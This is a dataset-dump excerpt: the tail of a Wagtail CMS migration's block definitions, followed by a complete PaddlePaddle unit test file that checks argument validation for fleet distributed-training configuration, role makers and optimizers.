published, issued, released.', label='Date stamp descriptor', required=False)), ('title', wagtail.core.blocks.BooleanBlock(default=True, help_text='Whether to include a "Search by keyword" filter in the filter controls.', label='Filter by keyword', required=False)), ('categories', wagtail.core.blocks.StructBlock([('filter_category', wagtail.core.blocks.BooleanBlock(default=True, help_text='Whether to include a "Category" filter in the filter controls.', label='Filter by Category', required=False)), ('show_preview_categories', wagtail.core.blocks.BooleanBlock(default=True, required=False)), ('page_type', wagtail.core.blocks.ChoiceBlock(choices=v1.util.ref.filterable_list_page_types, required=False))])), ('topic_filtering', wagtail.core.blocks.ChoiceBlock(choices=[('no_filter', "Don't filter topics"), ('sort_alphabetically', 'Filter topics, sort topic list alphabetically'), ('sort_by_frequency', 'Filter topics, sort topic list by number of results')], help_text='Whether to include a "Topics" filter in the filter controls')), ('order_by', wagtail.core.blocks.ChoiceBlock(choices=[('-date_published', 'Date Published'), ('_score', 'Relevance')], help_text='How to order results')), ('statuses', wagtail.core.blocks.BooleanBlock(default=False, help_text='Whether to include a "Status" filter in the filter controls. Only enable if using on an enforcement actions filterable list.', label='Filter by Enforcement Statuses', required=False)), ('products', wagtail.core.blocks.BooleanBlock(default=False, help_text='Whether to include a "Product" filter in the filter controls. 
Only enable if using on an enforcement actions filterable list.', label='Filter by Enforcement Products', required=False)), ('authors', wagtail.core.blocks.BooleanBlock(default=True, label='Filter Authors', required=False)), ('date_range', wagtail.core.blocks.BooleanBlock(default=True, help_text='Whether to include a set of "Date range" filters in the filter controls.', label='Filter by Date Range', required=False)), ('output_5050', wagtail.core.blocks.BooleanBlock(default=False, label='Render preview items as 50-50s', required=False)), ('link_image_and_heading', wagtail.core.blocks.BooleanBlock(default=False, help_text='Add links to post preview images and headings in filterable list results', required=False)), ('filter_children', wagtail.core.blocks.BooleanBlock(default=True, help_text='If checked this list will only filter its child pages. If both children and siblings are checked, only child pages will be filtered.', required=False))])), ('featured_content', wagtail.core.blocks.StructBlock([('heading', wagtail.core.blocks.CharBlock()), ('body', wagtail.core.blocks.TextBlock(help_text='Line breaks will be ignored.')), ('post', wagtail.core.blocks.PageChooserBlock(required=False)), ('show_post_link', wagtail.core.blocks.BooleanBlock(label='Render post link?', required=False)), ('post_link_text', wagtail.core.blocks.CharBlock(required=False)), ('image', wagtail.core.blocks.StructBlock([('upload', wagtail.images.blocks.ImageChooserBlock(required=False)), ('alt', wagtail.core.blocks.CharBlock(help_text="If the image is decorative (i.e., if a screenreader wouldn't have anything useful to say about it), leave the Alt field blank.", required=False))])), ('links', wagtail.core.blocks.ListBlock(wagtail.core.blocks.StructBlock([('text', wagtail.core.blocks.CharBlock(required=False)), ('aria_label', wagtail.core.blocks.CharBlock(help_text='Add an ARIA label if the link text does not describe the destination of the link (e.g. 
has ambiguous text like "Learn more" that is not descriptive on its own).', required=False)), ('url', wagtail.core.blocks.CharBlock(default='/', required=False))]), label='Additional Links')), ('video', wagtail.core.blocks.StructBlock([('video_id', wagtail.core.blocks.RegexBlock(error_messages={'invalid': 'The YouTube video ID is in the wrong format.'}, help_text='Enter the YouTube video ID, which is located at the end of the video URL, after "v=". For example, the video ID for https://www.youtube.com/watch?v=1V0Ax9OIc84 is 1V0Ax9OIc84.', label='YouTube video ID', regex='^[\\w-]{11}$', required=False)), ('thumbnail_image', wagtail.images.blocks.ImageChooserBlock(help_text='Optional thumbnail image to show before and after the video plays. If the thumbnail image is not set here, the video player will default to showing the thumbnail that was set in (or automatically chosen by) YouTube.', required=False))], required=False))])), ('feedback', wagtail.core.blocks.StructBlock([('was_it_helpful_text', wagtail.core.blocks.CharBlock(default='Was this page helpful to you?', help_text='Use this field only for feedback forms that use "Was this helpful?" 
radio buttons.', required=False)), ('intro_text', wagtail.core.blocks.CharBlock(help_text='Optional feedback intro', required=False)), ('question_text', wagtail.core.blocks.CharBlock(help_text='Optional expansion on intro', required=False)), ('radio_intro', wagtail.core.blocks.CharBlock(help_text='Leave blank unless you are building a feedback form with extra radio-button prompts, as in /owning-a-home/help-us-improve/.', required=False)), ('radio_text', wagtail.core.blocks.CharBlock(default='This information helps us understand your question better.', required=False)), ('radio_question_1', wagtail.core.blocks.CharBlock(default='How soon do you expect to buy a home?', required=False)), ('radio_question_2', wagtail.core.blocks.CharBlock(default='Do you currently own a home?', required=False)), ('button_text', wagtail.core.blocks.CharBlock(default='Submit')), ('contact_advisory', wagtail.core.blocks.RichTextBlock(help_text='Use only for feedback forms that ask for a contact email', required=False))]))]),
),
]
| 792.066667 | 13,060 | 0.759742 |
139ce121ad58718f508d95b212daaf7db592a1a4 | 11,165 | py | Python | python/paddle/fluid/tests/unittests/test_fleet_api_input.py | L-Net-1992/Paddle | 4d0ca02ba56760b456f3d4b42a538555b9b6c307 | [
"Apache-2.0"
] | 11 | 2016-08-29T07:43:26.000Z | 2016-08-29T07:51:24.000Z | python/paddle/fluid/tests/unittests/test_fleet_api_input.py | L-Net-1992/Paddle | 4d0ca02ba56760b456f3d4b42a538555b9b6c307 | [
"Apache-2.0"
] | null | null | null | python/paddle/fluid/tests/unittests/test_fleet_api_input.py | L-Net-1992/Paddle | 4d0ca02ba56760b456f3d4b42a538555b9b6c307 | [
"Apache-2.0"
] | 1 | 2021-12-09T08:59:17.000Z | 2021-12-09T08:59:17.000Z | # Copyright (c) 2018 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
import unittest
import paddle.fluid as fluid
from paddle.fluid.transpiler.distribute_transpiler import DistributeTranspilerConfig
from paddle.fluid.incubate.fleet.base.role_maker import UserDefinedRoleMaker
from paddle.fluid.incubate.fleet.base.role_maker import UserDefinedCollectiveRoleMaker
from paddle.fluid.incubate.fleet.base.role_maker import Role
import paddle.fluid.incubate.fleet.base.role_maker as role_maker
from paddle.fluid.incubate.fleet.parameter_server.distribute_transpiler import fleet
from paddle.fluid.incubate.fleet.parameter_server import TranspilerOptimizer
from paddle.fluid.incubate.fleet.collective import CollectiveOptimizer
from dist_simnet_bow import train_network
class DistributeTranspilerConfigTest(unittest.TestCase):
    """Validate the attribute setters of DistributeTranspilerConfig."""

    def set_runtime_split_send_recv(self, config, value):
        # Indirection so the assignment can be exercised inside assertRaises.
        config.runtime_split_send_recv = value

    def set_sync_mode(self, config, value):
        # Indirection so the assignment can be exercised inside assertRaises.
        config.sync_mode = value

    def testConfig(self):
        cfg = DistributeTranspilerConfig()
        # Invalid values are expected to be rejected by the config.
        with self.assertRaises(Exception):
            self.set_sync_mode(cfg, None)
        with self.assertRaises(Exception):
            self.set_runtime_split_send_recv(cfg, None)
        # Setting runtime_split_send_recv=True raises at this point
        # (before sync_mode has been turned off).
        with self.assertRaises(Exception):
            self.set_runtime_split_send_recv(cfg, True)
        self.set_sync_mode(cfg, False)
        self.assertFalse(cfg.sync_mode)
        self.set_runtime_split_send_recv(cfg, True)
        # After split send/recv is enabled, re-enabling sync_mode raises.
        with self.assertRaises(Exception):
            self.set_sync_mode(cfg, True)
class FleetTest(unittest.TestCase):
    """Negative and smoke tests for the fleet parameter-server API."""

    def testInvalidInputs(self):
        # Wrong-typed arguments must be rejected up front.
        with self.assertRaises(Exception):
            fleet.split_files("files")
        with self.assertRaises(Exception):
            fleet.init("pserver")
        # Build a minimal network so real executor objects exist to misuse.
        data = fluid.layers.data(name='X', shape=[1], dtype='float32')
        hidden = fluid.layers.fc(input=data, size=10)
        loss = fluid.layers.mean(hidden)
        adam = fluid.optimizer.Adam()
        adam.minimize(loss)
        place = fluid.CPUPlace()
        exe = fluid.Executor(place)
        pe = fluid.ParallelExecutor(use_cuda=False, loss_name=loss.name)
        # save_inference_model rejects a ParallelExecutor ...
        with self.assertRaises(Exception):
            fleet.save_inference_model(dirname='/tmp/',
                                       feeded_var_names=['X'],
                                       target_vars=[loss],
                                       executor=pe)
        # ... and rejects a plain string in place of an executor.
        with self.assertRaises(Exception):
            fleet.save_inference_model(dirname='/tmp/',
                                       feeded_var_names=['X'],
                                       target_vars=[loss],
                                       executor="executor")
        compiled_prog = fluid.compiler.CompiledProgram(
            fluid.default_main_program())
        # A CompiledProgram is not accepted as main_program here.
        with self.assertRaises(Exception):
            fleet.save_inference_model(dirname='/tmp/',
                                       feeded_var_names=['X'],
                                       target_vars=[loss],
                                       executor=exe,
                                       main_program=compiled_prog)
        # save_persistables applies the same executor/program validation.
        with self.assertRaises(Exception):
            fleet.save_persistables(executor=pe, dirname='/tmp/')
        with self.assertRaises(Exception):
            fleet.save_persistables(executor="executor", dirname='/tmp/')
        with self.assertRaises(Exception):
            fleet.save_persistables(executor=exe,
                                    dirname='/tmp/',
                                    main_program=compiled_prog)
        with self.assertRaises(Exception):
            fleet._transpile("config")

    def set_program(self, avg_cost, strategy):
        # Run minimize inside a fresh scope so test cases stay isolated.
        with fluid.scope_guard(fluid.Scope()):
            optimizer = fluid.optimizer.SGD(0.1)
            optimizer = fleet.distributed_optimizer(optimizer, strategy)
            optimizer.minimize(avg_cost)

    def test_init_role(self):
        role = role_maker.UserDefinedRoleMaker(
            current_id=0,
            role=role_maker.Role.SERVER,
            worker_num=2,
            server_endpoints=["127.0.0.1:36011", "127.0.0.1:36012"])
        # fleet.init(role) is deliberately skipped: minimizing without an
        # initialized role is the failure this test expects.
        batch_size = 128
        is_sparse = True
        is_distribute = False
        strategy = DistributeTranspilerConfig()
        strategy.sync_mode = False
        strategy.geo_sgd_mode = True
        strategy.geo_sgd_need_push_nums = 5
        avg_cost, _, _ = train_network(batch_size, is_distribute, is_sparse)
        with self.assertRaises(Exception):
            self.set_program(avg_cost, strategy)

    def test_transpile(self):
        role = role_maker.UserDefinedRoleMaker(
            current_id=0,
            role=role_maker.Role.SERVER,
            worker_num=2,
            server_endpoints=["127.0.0.1:36011", "127.0.0.1:36012"])
        # Initialize fleet with the role so transpilation can proceed.
        fleet.init(role)
        batch_size = 128
        is_sparse = True
        is_distribute = False
        strategy = DistributeTranspilerConfig()
        strategy.sync_mode = False
        strategy.runtime_split_send_recv = True
        avg_cost, _, _ = train_network(batch_size, is_distribute, is_sparse)
        # Transpile once with runtime split send/recv on, then with it off.
        self.set_program(avg_cost, strategy)
        strategy.runtime_split_send_recv = False
        self.set_program(avg_cost, strategy)
class TranspilerOptimizerTest(unittest.TestCase):
    """Argument validation for TranspilerOptimizer construction/minimize."""

    def testInvalidInputs(self):
        # A plain string is not a valid inner optimizer.
        with self.assertRaises(Exception):
            TranspilerOptimizer("Adam", None)
        # A plain string is not a valid strategy object either.
        with self.assertRaises(Exception):
            TranspilerOptimizer(fluid.optimizer.Adam(0.001), "strategy")
        transpiler = TranspilerOptimizer(fluid.optimizer.Adam(0.001))
        # minimize rejects a non-Variable loss.
        with self.assertRaises(Exception):
            transpiler.minimize(loss=[])
        data = fluid.layers.data(name='X', shape=[1], dtype='float32')
        hidden = fluid.layers.fc(input=data, size=10)
        loss = fluid.layers.mean(hidden)
        # A loss name (string) and a list startup_program are both invalid.
        with self.assertRaises(Exception):
            transpiler.minimize(loss=loss.name, startup_program=[])
class UserDefinedRoleMakerTest(unittest.TestCase):
    """Exercise the argument validation of UserDefinedRoleMaker."""

    # Sentinel meaning "use the default endpoint list". ``None`` cannot be
    # the sentinel because passing ``None`` explicitly is one of the invalid
    # inputs this test asserts on.
    _DEFAULT_ENDPOINTS = object()

    def createRoleMaker(self,
                        current_id=0,
                        role=Role.WORKER,
                        worker_num=1,
                        server_endpoints=_DEFAULT_ENDPOINTS):
        """Construct a UserDefinedRoleMaker; defaults form a valid setup.

        The endpoint default is a sentinel rather than a mutable list
        literal, avoiding the shared-mutable-default pitfall; a fresh list
        is built on every call.
        """
        if server_endpoints is self._DEFAULT_ENDPOINTS:
            server_endpoints = ["127.0.0.1:8080"]
        # Constructed purely for its validation side effects; the instance
        # itself is discarded.
        UserDefinedRoleMaker(current_id, role, worker_num, server_endpoints)

    def testRoleMaker(self):
        # The defaults must construct cleanly.
        self.createRoleMaker()
        # test all invalid server_endpoints
        self.assertRaises(
            Exception, self.createRoleMaker,
            server_endpoints=None)  # server_endpoints must be as list
        self.assertRaises(
            Exception, self.createRoleMaker,
            server_endpoints=[])  # server_endpoints can't be empty
        self.assertRaises(Exception,
                          self.createRoleMaker,
                          server_endpoints=[
                              3, []
                          ])  # element in server_endpoints must be as string
        self.assertRaises(Exception,
                          self.createRoleMaker,
                          server_endpoints=[
                              "127.0.0.1:8080", "127.0.0.1:8080"
                          ])  # element in server_endpoints can't be duplicate
        # test all invalid current_id
        self.assertRaises(Exception, self.createRoleMaker,
                          current_id="0")  # current_id must be as int
        self.assertRaises(
            Exception, self.createRoleMaker,
            current_id=-1)  # current_id must be greater than or equal to 0
        self.assertRaises(
            Exception,
            self.createRoleMaker,
            current_id=1,
            role=Role.SERVER,
            server_endpoints=["127.0.0.1:8080"]
        )  # if role is server, current_id must be less than len(server_endpoints)
        # test all invalid worker_num
        self.assertRaises(Exception, self.createRoleMaker,
                          worker_num="1")  # worker_num must be as int
        self.assertRaises(Exception, self.createRoleMaker,
                          worker_num=0)  # worker_num must be greater than 0
        # test all invalid role
        self.assertRaises(
            Exception, self.createRoleMaker,
            role=3)  # role must be as Role(Role.WORKER=1, Role.SERVER=2)
class UserDefinedCollectiveRoleMakerTest(unittest.TestCase):
    """Exercise the argument validation of UserDefinedCollectiveRoleMaker."""

    # Sentinel meaning "use the default endpoint list". ``None`` cannot be
    # the sentinel because passing ``None`` explicitly is one of the invalid
    # inputs this test asserts on.
    _DEFAULT_ENDPOINTS = object()

    def createRoleMaker(self,
                        current_id=0,
                        worker_endpoints=_DEFAULT_ENDPOINTS):
        """Construct a UserDefinedCollectiveRoleMaker with valid defaults.

        The endpoint default is a sentinel rather than a mutable list
        literal, avoiding the shared-mutable-default pitfall; a fresh list
        is built on every call.
        """
        if worker_endpoints is self._DEFAULT_ENDPOINTS:
            worker_endpoints = ["127.0.0.1:8080"]
        # Constructed purely for its validation side effects; the instance
        # itself is discarded.
        UserDefinedCollectiveRoleMaker(current_id, worker_endpoints)

    def testRoleMaker(self):
        # The defaults must construct cleanly.
        self.createRoleMaker()
        # test all invalid worker_endpoints
        self.assertRaises(
            Exception, self.createRoleMaker,
            worker_endpoints=None)  # worker_endpoints must be as list
        self.assertRaises(
            Exception, self.createRoleMaker,
            worker_endpoints=[])  # worker_endpoints can't be empty
        self.assertRaises(Exception,
                          self.createRoleMaker,
                          worker_endpoints=[
                              3, []
                          ])  # element worker_endpoints must be as string
        self.assertRaises(Exception,
                          self.createRoleMaker,
                          worker_endpoints=[
                              "127.0.0.1:8080", "127.0.0.1:8080"
                          ])  # element in worker_endpoints can't be duplicate
        # test all invalid current_id
        self.assertRaises(Exception, self.createRoleMaker,
                          current_id="0")  # current_id must be as int
        self.assertRaises(
            Exception, self.createRoleMaker,
            current_id=-1)  # current_id must be greater than or equal to 0
        self.assertRaises(
            Exception,
            self.createRoleMaker,
            current_id=1,
            worker_endpoints=[
                "127.0.0.1:8080"
            ])  # current_id must be less than len(worker_endpoints)
class CollectiveOptimizerTest(unittest.TestCase):
    """Smoke-test CollectiveOptimizer construction."""

    def test_ds_as_None(self):
        # Wrapping an optimizer with strategy=None must not raise.
        inner_opt = fluid.optimizer.AdamOptimizer()
        CollectiveOptimizer(inner_opt, strategy=None)
# Run the full test suite when this file is executed directly.
if __name__ == '__main__':
    unittest.main()
| 41.505576 | 86 | 0.60215 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.